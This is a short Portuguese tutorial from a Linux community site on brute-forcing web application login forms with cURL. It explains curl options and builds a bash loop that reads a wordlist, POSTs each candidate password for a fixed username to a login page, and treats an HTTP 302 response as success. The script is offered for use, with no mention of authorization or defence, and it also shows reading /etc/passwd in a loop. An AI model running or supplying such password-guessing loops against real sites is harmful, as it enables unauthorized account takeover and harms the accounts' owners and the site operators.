cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 12.109 ]
cURL - Brute-force em aplicações Web
Primeiro, iremos ver algumas opções de linha de comando do cURL:
curl -h
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.
Entendo as opções:
1. As opções "-s" e "-o" são para não exibirem o conteúdo HTML do request; iremos mandar essa saída de comando para o /dev/null.
2. O comando "-F" funciona para enviar os parâmetros através de "POST request".
Exemplo:
curl -F teste=enviando-post localhost/teste.php
Exemplo:
curl -w "%{http_code}" localhost/lol
Fazendo o ataque
Agora iremos proceder para o ataque de brute-force. Primeiro, temos que saber quais os nomes dos campos que iremos enviar pelo POST request.Exemplo: login, password, log, passwd, user, etc.
Tendo essas informações, iremos transformar a saída do comando em uma variável.
Exemplo:
curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php
login=$(curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php)
Agora, para proceder com o ataque de "word list" iremos usar o "for" para ler um arquivo linha por linha.
Exemplo:
for i in `cat /etc/passwd`;do echo $i; done
Nosso comando final ficará assim:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Espero que tenham gostado da dica.
[]'s
Dica também publicada em:
Filtrando porcarias com o Squid II
Iniciando com o YUM, gerenciador de pacotes
Instalando o Drive NVIDIA-Linux-x86_64-285.05.09.run no Debian 6
Conexão de rede cabeada no Gnome com Avahi
Placa de som C-Media CM8738 no Mandriva 2006
Descobrir o MAC address de um IP com arping
Repositórios YUM para Red Hat, Fedora e CentOS - Instalação via Script
Letras Bacanas no seu Shell Script sem Figlet
if/then/elif/else - Escrevendo de outra maneira em bash
Nenhum comentário foi encontrado.
Patrocínio
Artigos
Como customizar sua ROM Android
Como forçar alteração de senha de usuário no próximo login no Linux
Trabalhando com permutações em ordem lexicográfica crescente
Dicas
Instalando um VLC melhor no Deepin 20
Como aumentar ou reduzir a velocidade de um vídeo via linha de comando
Instalar facilmente o Warsaw no Gentoo
Tópicos
Qual a melhor estratégia para se proteger legalmente um algoritmo novo... (6)
Linux nao reconhece produtos Roland (1)
Como crio um pren drive bootavel windows no linux? [RESOLVIDO] (2)
Top 10 do mês
-
Xerxes Lins
1° lugar - 75.892 pts -
Fábio Berbert de Paula
2° lugar - 68.061 pts -
Clodoaldo Santos
3° lugar - 48.137 pts -
leandro peçanha scardua
4° lugar - 32.244 pts -
Alberto Federman Neto.
5° lugar - 30.750 pts -
Daniel Lara Souza
6° lugar - 26.232 pts -
Mauricio Ferrari
7° lugar - 24.494 pts -
Diego Mendes Rodrigues
8° lugar - 24.442 pts -
Lisandro Guerra
9° lugar - 23.440 pts -
edps
10° lugar - 22.658 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
